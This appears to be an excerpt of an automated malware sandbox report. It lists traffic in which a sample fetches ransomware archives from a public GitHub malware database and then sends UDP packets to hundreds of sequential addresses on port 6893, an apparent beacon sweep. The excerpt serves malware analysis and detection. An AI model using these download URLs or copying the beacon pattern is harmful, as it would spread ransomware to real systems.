      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: Joe Sandbox ViewIP Address: 87.98.177.219 87.98.177.219
      Source: Joe Sandbox ViewIP Address: 87.98.177.218 87.98.177.218
      Source: Joe Sandbox ViewIP Address: 87.98.177.215 87.98.177.215
      Source: global trafficTCP traffic: 192.168.2.6:49737 -> 23.50.106.206:139
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.46:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.47:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.48:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.49:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.50:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.51:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.52:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.53:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.54:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.55:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.56:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.57:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.58:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.59:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.60:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.61:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.62:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.63:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.64:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.65:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.66:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.67:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.68:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.70:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.69:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.71:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.72:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.73:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.74:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.75:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.76:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.77:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.78:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.79:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.80:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.81:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.82:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.83:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.84:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.85:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.86:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.87:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.88:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.89:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.90:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.91:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.92:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.93:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.94:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.95:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.96:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.97:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.98:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.99:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.100:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.101:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.102:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.103:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.104:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.105:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.107:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.108:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.106:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.109:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.110:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.111:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.112:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.113:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.114:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.115:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.116:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.117:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.118:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.119:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.120:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.121:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.122:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.123:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.124:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.125:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.126:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.127:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.128:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.129:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.130:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.131:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.132:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.133:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.134:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.135:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.137:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.136:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.138:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.139:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.140:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.141:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.142:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.143:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.144:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.145:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.146:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.147:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.148:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.149:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.150:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.151:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.152:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.154:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.153:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.155:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.156:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.157:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.158:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.159:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.160:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.161:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.162:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.163:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.164:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.165:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.166:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.167:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.168:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.169:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.170:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.171:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.172:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.173:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.174:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.175:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.176:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.177:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.178:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.179:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.180:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.181:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.182:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.183:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.184:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.186:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.185:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.187:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.188:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.189:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.190:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.191:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.192:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.193:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.194:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.195:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.196:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.197:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.198:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.199:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.200:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.201:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.202:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.203:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.204:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.205:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.206:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.207:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.208:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.209:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.210:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.211:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.212:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.213:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.214:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.215:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.216:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.218:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.219:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.217:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.220:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.221:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.222:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.223:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.224:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.225:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.226:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.227:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.228:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.229:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.230:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.231:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.232:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.233:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.234:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.235:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.236:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.237:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.238:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.239:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.240:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.241:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.242:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.243:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.244:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.245:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.247:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.248:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.246:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.249:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.250:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.251:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.252:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.253:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.254:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.176.255:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.0:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.1:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.2:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.3:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.4:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.5:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.6:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.7:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.8:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.9:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.10:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.11:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.12:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.13:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.14:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.15:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.16:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.17:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.19:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.20:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.21:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.22:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.18:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.23:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.24:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.25:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.26:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.27:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.28:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.29:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.30:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.31:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.32:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.33:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.34:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.36:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.35:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.37:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.38:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.39:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.40:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.43:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.53:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.42:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.52:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.41:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.44:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.50:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.47:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.49:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.46:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.48:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.45:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.51:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.55:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.54:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.56:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.57:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.58:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.59:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.60:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.61:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.62:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.63:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.64:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.65:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.66:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.68:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.69:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.70:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.67:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.71:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.72:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.73:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.74:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.75:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.76:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.77:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.78:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.79:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.80:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.81:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.82:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.83:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.84:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.85:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.86:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.87:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.88:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.89:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.90:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.91:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.92:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.93:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.94:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.95:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.96:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.97:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.98:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.99:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.100:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.101:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.102:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.103:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.104:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.105:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.106:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.107:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.108:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.109:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.110:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.111:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.112:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.113:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.114:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.115:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.116:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.117:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.118:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.119:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.120:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.121:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.122:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.123:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.124:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.125:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.126:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.127:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.128:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.129:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.130:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.131:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.132:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.133:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.134:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.135:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.136:6893
      Source: global trafficUDP traffic: 192.168.2.6:59083 -> 87.98.177.137:6893
      Source: rundll32.exe, 00000003.00000003.307238763.00000000041F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
      Source: rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/5
      Source: rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/;
